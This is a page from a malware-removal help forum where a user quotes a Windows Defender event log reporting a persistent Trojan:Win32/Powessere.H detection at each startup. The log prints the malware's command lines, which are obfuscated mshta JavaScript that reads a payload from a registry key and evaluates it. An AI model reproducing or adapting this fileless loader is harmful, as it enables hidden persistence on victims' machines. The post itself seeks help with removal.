Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Support
Windows Malware Removal Help & Support
Persistant Trojan:Win32/Powessere.H
Message
<blockquote data-quote="CainPDX" data-source="post: 715672" data-attributes="member: 70545"><p>Event Viewer gave this information on Event 1116 which is one of many similar events that occur each time I turn on my computer:</p><p><span style="font-size: 12px">Windows Defender Antivirus has detected malware or other potentially unwanted software.</span></p><p> <span style="font-size: 12px">For more information please see the following:</span></p><p><span style="font-size: 12px"><a href="https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.H&threatid=2147726088&enterprise=0" target="_blank">Trojan:Win32/Powessere.H threat description - Windows Defender Security Intelligence</a></span></p><p><span style="font-size: 12px"> Name: Trojan:Win32/Powessere.H</span></p><p><span style="font-size: 12px"> ID: 2147726088</span></p><p><span style="font-size: 12px"> Severity: Severe</span></p><p><span style="font-size: 12px"> Category: Trojan</span></p><p><span style="font-size: 12px"> Path: CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:np8si="wPk";U5s=new ActiveXObject("WScript.Shell");DY3YUb4="cf0QT2cs";ht9kH1=U5s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");B9OL8lS="v3R7";eval(ht9kH1);yod1qRHe="najkzw5";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite115" alt=":p" title="Stick out tongue :p" loading="lazy" data-shortname=":p" />1ytp3UQ="OsEleDvM";T9w9=new ActiveXObject("WScript.Shell");jqZ5p="z85p";O1w2wW=T9w9.RegRead("HKCU\\software\\eewn\\jmvryxenjm");W0kFQ0aRP="Moquky";eval(O1w2wW);yevFGLg7="TNvL";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" "javascript:HIYtYH1X="BbcyJUP";rs47=new ActiveXObject("WScript.Shell");iM5UN9Ac="X";mYgT0=rs47.RegRead("HKCU\\software\\eewn\\jmvryxenjm");S1Slz="ZtF9r";eval(mYgT0);RuWi9="jbZ8qk";"</span></p><p><span style="font-size: 12px"> Detection Origin: Unknown</span></p><p><span style="font-size: 12px"> Detection Type: Concrete</span></p><p><span style="font-size: 12px"> Detection Source: System</span></p><p><span style="font-size: 12px"> User: NT AUTHORITY\SYSTEM</span></p><p><span style="font-size: 12px"> Process Name: Unknown</span></p><p><span style="font-size: 12px"> Signature Version: AV: 1.263.119.0, AS: 1.263.119.0, NIS: 118.2.0.0</span></p><p><span style="font-size: 12px"> Engine Version: AM: 1.1.14600.4, NIS: 2.1.14202.0</span></p></blockquote><p></p>
[QUOTE="CainPDX, post: 715672, member: 70545"] Event Viewer gave this information on Event 1116 which is one of many similar events that occur each time I turn on my computer: [SIZE=3]Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: [URL="https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.H&threatid=2147726088&enterprise=0"]Trojan:Win32/Powessere.H threat description - Windows Defender Security Intelligence[/URL] Name: Trojan:Win32/Powessere.H ID: 2147726088 Severity: Severe Category: Trojan Path: CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:np8si="wPk";U5s=new ActiveXObject("WScript.Shell");DY3YUb4="cf0QT2cs";ht9kH1=U5s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");B9OL8lS="v3R7";eval(ht9kH1);yod1qRHe="najkzw5";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:p1ytp3UQ="OsEleDvM";T9w9=new ActiveXObject("WScript.Shell");jqZ5p="z85p";O1w2wW=T9w9.RegRead("HKCU\\software\\eewn\\jmvryxenjm");W0kFQ0aRP="Moquky";eval(O1w2wW);yevFGLg7="TNvL";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" "javascript:HIYtYH1X="BbcyJUP";rs47=new ActiveXObject("WScript.Shell");iM5UN9Ac="X";mYgT0=rs47.RegRead("HKCU\\software\\eewn\\jmvryxenjm");S1Slz="ZtF9r";eval(mYgT0);RuWi9="jbZ8qk";" Detection Origin: Unknown Detection Type: Concrete Detection Source: System User: NT AUTHORITY\SYSTEM Process Name: Unknown Signature Version: AV: 1.263.119.0, AS: 1.263.119.0, NIS: 118.2.0.0 Engine Version: AM: 1.1.14600.4, NIS: 2.1.14202.0[/SIZE] [/QUOTE]
Insert quotes…
Verification
Post reply
Top